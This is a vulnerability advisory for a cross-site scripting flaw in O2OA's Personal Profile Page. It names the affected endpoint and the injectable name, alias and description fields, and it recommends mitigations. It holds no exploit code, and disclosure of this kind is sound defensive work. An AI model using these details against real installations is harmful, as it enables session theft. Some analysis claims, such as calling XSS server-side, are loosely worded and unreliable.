CVE-2025-9658 in O2OA
Summary
by MITRE • 08/29/2025
A flaw has been found in O2OA up to 10.0-410. Impacted is an unknown function of the file /x_portal_assemble_designer/jaxrs/dict/ of the component Personal Profile Page. This manipulation of the argument name/alias/description causes cross site scripting. Remote exploitation of the attack is possible. The exploit has been published and may be used. The vendor replied in the GitHub issue (translated from simplified Chinese): "This issue will be fixed in the new version."
If you want to get best quality of vulnerability data, you may have to visit VulDB.
Analysis
by VulDB Data Team • 09/17/2025
The vulnerability identified as CVE-2025-9658 affects the O2OA platform version 10.0-410 and earlier, specifically within the Personal Profile Page component. This flaw exists in the file path /x_portal_assemble_designer/jaxrs/dict/ which handles dictionary data processing for the user interface. The issue manifests when user-supplied input parameters including name, alias, or description are not properly sanitized before being rendered back to the browser, creating a classic cross-site scripting vulnerability that allows attackers to inject malicious scripts into web pages viewed by other users.
The technical implementation of this vulnerability stems from insufficient input validation and output encoding mechanisms within the affected component. When administrators or users provide data through the personal profile page interface, the system fails to properly escape special characters and HTML entities in the name/alias/description fields. This allows malicious actors to inject script tags or other malicious payloads that execute in the context of other users' browsers. The vulnerability is classified under CWE-79 as "Cross-site Scripting" and represents a server-side injection flaw that can be exploited through web requests. The attack vector is particularly concerning as it operates over HTTP/HTTPS protocols and requires no authentication for exploitation, making it highly accessible to remote attackers.
Remote exploitation of this vulnerability presents significant operational risks to organizations using affected O2OA versions. Attackers can leverage this flaw to steal session cookies, perform unauthorized actions on behalf of users, redirect victims to malicious websites, or execute arbitrary code within the browser context. The published exploit availability increases the threat level substantially as it removes the requirement for advanced technical skills to carry out attacks. This vulnerability directly impacts the principle of least privilege and can be used to escalate privileges within the application, potentially leading to complete system compromise if the targeted users have administrative capabilities. The affected component's role in user profile management makes it a prime target for persistent attacks that can remain undetected for extended periods.
The vendor has acknowledged this security issue and committed to addressing it in future releases, as indicated through their GitHub issue response. Organizations currently running affected versions should implement immediate mitigations including input validation measures, output encoding, and web application firewall rules to prevent exploitation. Security teams should conduct comprehensive vulnerability assessments of their O2OA installations and consider implementing temporary network segmentation or access controls to limit exposure. The remediation approach should include thorough code review of the affected component to ensure proper sanitization of user inputs and implementation of Content Security Policy headers to prevent script execution. Additionally, organizations should monitor for any updates or patches released by the vendor that specifically address this CWE-79 vulnerability and implement them promptly to maintain system integrity and protect against potential exploitation attempts.